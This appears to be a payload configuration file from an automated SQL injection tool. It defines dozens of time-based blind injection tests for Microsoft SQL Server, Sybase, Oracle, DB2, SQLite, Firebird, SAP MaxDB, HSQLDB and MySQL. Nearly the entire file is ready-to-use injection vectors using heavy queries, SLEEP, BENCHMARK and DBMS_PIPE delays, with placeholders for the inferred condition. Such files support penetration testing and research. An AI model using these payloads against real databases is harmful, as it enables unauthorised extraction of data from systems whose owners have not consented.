    <test>        <title>Microsoft SQL Server/Sybase AND time-based blind (heavy query)</title>        <stype>5</stype>        <level>2</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>        <request>            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Microsoft SQL Server</dbms>            <dbms>Sybase</dbms>            <os>Windows</os>        </details>    </test>
    <test>        <title>Microsoft SQL Server/Sybase OR time-based blind (heavy query)</title>        <stype>5</stype>        <level>2</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>        <request>            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Microsoft SQL Server</dbms>            <dbms>Sybase</dbms>            <os>Windows</os>        </details>    </test>
    <test>        <title>Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>        <request>            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Microsoft SQL Server</dbms>            <dbms>Sybase</dbms>            <os>Windows</os>        </details>    </test>
    <test>        <title>Microsoft SQL Server/Sybase OR time-based blind (heavy query - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>        <request>            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Microsoft SQL Server</dbms>            <dbms>Sybase</dbms>            <os>Windows</os>        </details>    </test>
    <test>        <title>Oracle AND time-based blind</title>        <stype>5</stype>        <level>1</level>        <risk>1</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>        <request>            <payload>AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>Oracle</dbms>        </details>    </test>
    <test>        <title>Oracle OR time-based blind</title>        <stype>5</stype>        <level>1</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>        <request>            <payload>OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>Oracle</dbms>        </details>    </test>
    <test>        <title>Oracle AND time-based blind (comment)</title>        <stype>5</stype>        <level>4</level>        <risk>1</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>        <request>            <payload>AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>            <comment>--</comment>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>Oracle</dbms>        </details>    </test>
    <test>        <title>Oracle OR time-based blind (comment)</title>        <stype>5</stype>        <level>4</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>        <request>            <payload>OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>            <comment>--</comment>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>Oracle</dbms>        </details>    </test>
    <test>        <title>Oracle AND time-based blind (heavy query)</title>        <stype>5</stype>        <level>2</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>        <request>            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Oracle</dbms>        </details>    </test>
    <test>        <title>Oracle OR time-based blind (heavy query)</title>        <stype>5</stype>        <level>2</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>        <request>            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Oracle</dbms>        </details>    </test>
    <test>        <title>Oracle AND time-based blind (heavy query - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>        <request>            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Oracle</dbms>        </details>    </test>
    <test>        <title>Oracle OR time-based blind (heavy query - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>        <request>            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Oracle</dbms>        </details>    </test>
    <test>        <title>IBM DB2 AND time-based blind (heavy query)</title>        <stype>5</stype>        <level>3</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>        <request>            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>IBM DB2</dbms>        </details>    </test>
    <test>        <title>IBM DB2 OR time-based blind (heavy query)</title>        <stype>5</stype>        <level>3</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>        <request>            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>IBM DB2</dbms>        </details>    </test>
    <test>        <title>IBM DB2 AND time-based blind (heavy query - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>        <request>            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>IBM DB2</dbms>        </details>    </test>
    <test>        <title>IBM DB2 OR time-based blind (heavy query - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>        <request>            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>IBM DB2</dbms>        </details>    </test>
    <test>        <title>SQLite > 2.0 AND time-based blind (heavy query)</title>        <stype>5</stype>        <level>3</level>        <risk>2</risk>        <clause>1</clause>        <where>1</where>        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>        <request>            <payload>AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>SQLite</dbms>            <dbms_version>> 2.0</dbms_version>        </details>    </test>
    <test>        <title>SQLite > 2.0 OR time-based blind (heavy query)</title>        <stype>5</stype>        <level>3</level>        <risk>3</risk>        <clause>1</clause>        <where>1</where>        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>        <request>            <payload>OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>SQLite</dbms>            <dbms_version>> 2.0</dbms_version>        </details>    </test>
    <test>        <title>SQLite > 2.0 AND time-based blind (heavy query - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>2</risk>        <clause>1</clause>        <where>1</where>        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>        <request>            <payload>AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>SQLite</dbms>            <dbms_version>> 2.0</dbms_version>        </details>    </test>
    <test>        <title>SQLite > 2.0 OR time-based blind (heavy query - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>3</risk>        <clause>1</clause>        <where>1</where>        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>        <request>            <payload>OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>SQLite</dbms>            <dbms_version>> 2.0</dbms_version>        </details>    </test>
    <test>        <title>Firebird >= 2.0 AND time-based blind (heavy query)</title>        <stype>5</stype>        <level>4</level>        <risk>2</risk>        <clause>1</clause>        <where>1</where>        <vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>        <request>            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Firebird</dbms>            <dbms_version>>= 2.0</dbms_version>        </details>    </test>
    <test>        <title>Firebird >= 2.0 OR time-based blind (heavy query)</title>        <stype>5</stype>        <level>4</level>        <risk>3</risk>        <clause>1</clause>        <where>1</where>        <vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>        <request>            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Firebird</dbms>            <dbms_version>>= 2.0</dbms_version>        </details>    </test>
    <test>        <title>Firebird >= 2.0 AND time-based blind (heavy query - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>2</risk>        <clause>1</clause>        <where>1</where>        <vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>        <request>            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Firebird</dbms>            <dbms_version>>= 2.0</dbms_version>        </details>    </test>
    <test>        <title>Firebird >= 2.0 OR time-based blind (heavy query - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>3</risk>        <clause>1</clause>        <where>1</where>        <vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>        <request>            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>Firebird</dbms>            <dbms_version>>= 2.0</dbms_version>        </details>    </test>
    <test>        <title>SAP MaxDB AND time-based blind (heavy query)</title>        <stype>5</stype>        <level>4</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>        <request>            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>SAP MaxDB</dbms>        </details>    </test>
    <test>        <title>SAP MaxDB OR time-based blind (heavy query)</title>        <stype>5</stype>        <level>4</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>        <request>            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>SAP MaxDB</dbms>        </details>    </test>
    <test>        <title>SAP MaxDB AND time-based blind (heavy query - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>        <request>            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>SAP MaxDB</dbms>        </details>    </test>
    <test>        <title>SAP MaxDB OR time-based blind (heavy query - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>        <request>            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>SAP MaxDB</dbms>        </details>    </test>
    <test>        <title>HSQLDB >= 1.7.2 AND time-based blind (heavy query)</title>        <stype>5</stype>        <level>4</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>        <request>            <payload>AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>HSQLDB</dbms>            <dbms_version>>= 1.7.2</dbms_version>        </details>    </test>
    <test>        <title>HSQLDB >= 1.7.2 OR time-based blind (heavy query)</title>        <stype>5</stype>        <level>4</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>        <request>            <payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>HSQLDB</dbms>            <dbms_version>>= 1.7.2</dbms_version>        </details>    </test>
    <test>        <title>HSQLDB >= 1.7.2 AND time-based blind (heavy query - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>        <request>            <payload>AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>HSQLDB</dbms>            <dbms_version>>= 1.7.2</dbms_version>        </details>    </test>
    <test>        <title>HSQLDB >= 1.7.2 OR time-based blind (heavy query - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>        <request>            <payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>HSQLDB</dbms>            <dbms_version>>= 1.7.2</dbms_version>        </details>    </test>
    <test>        <title>HSQLDB > 2.0 AND time-based blind (heavy query)</title>        <stype>5</stype>        <level>4</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>        <request>            <payload>AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>HSQLDB</dbms>            <dbms_version>> 2.0</dbms_version>        </details>    </test>
    <test>        <title>HSQLDB > 2.0 OR time-based blind (heavy query)</title>        <stype>5</stype>        <level>4</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>        <request>            <payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>HSQLDB</dbms>            <dbms_version>> 2.0</dbms_version>        </details>    </test>
    <test>        <title>HSQLDB > 2.0 AND time-based blind (heavy query - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>2</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>        <request>            <payload>AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>HSQLDB</dbms>            <dbms_version>> 2.0</dbms_version>        </details>    </test>
    <test>        <title>HSQLDB > 2.0 OR time-based blind (heavy query - comment)</title>        <stype>5</stype>        <level>5</level>        <risk>3</risk>        <clause>1,2,3</clause>        <where>1</where>        <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>        <request>            <payload>OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>            <comment>--</comment>        </request>        <response>            <time>[DELAYED]</time>        </response>        <details>            <dbms>HSQLDB</dbms>            <dbms_version>> 2.0</dbms_version>        </details>    </test>    <!-- TODO: if possible, add payload for Microsoft Access -->    <!-- End of time-based boolean tests -->
    <!-- Time-based boolean tests - Numerous clauses -->    <!-- This payload does not work with SLEEP() -->    <test>        <title>MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)</title>        <stype>5</stype>        <level>3</level>        <risk>2</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)</vector>        <request>            <payload>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))))),1)</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>            <dbms_version>>= 5.0.12</dbms_version>        </details>    </test>
    <test>        <title>MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)</title>        <stype>5</stype>        <level>5</level>        <risk>2</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)</vector>        <request>            <payload>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))))),1)</payload>            <comment>#</comment>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>            <dbms_version>>= 5.0.12</dbms_version>        </details>    </test>    <!-- End of time-based boolean tests - Numerous clauses -->
    <!-- Time-based boolean tests - Parameter replace -->    <test>        <title>MySQL >= 5.0.12 time-based blind - Parameter replace</title>        <stype>5</stype>        <level>2</level>        <risk>1</risk>        <clause>1,2,3</clause>        <where>3</where>        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>        <request>            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>            <dbms_version>>= 5.0.12</dbms_version>        </details>    </test>
    <test>        <title>MySQL >= 5.0.12 time-based blind - Parameter replace (SELECT)</title>        <stype>5</stype>        <level>3</level>        <risk>1</risk>        <clause>1,2,3</clause>        <where>3</where>        <vector>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>        <request>            <payload>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>        </request>        <response>            <time>[SLEEPTIME]</time>        </response>        <details>            <dbms>MySQL</dbms>            <dbms_version>>= 5.0.12</dbms_version>        </details>    </test>
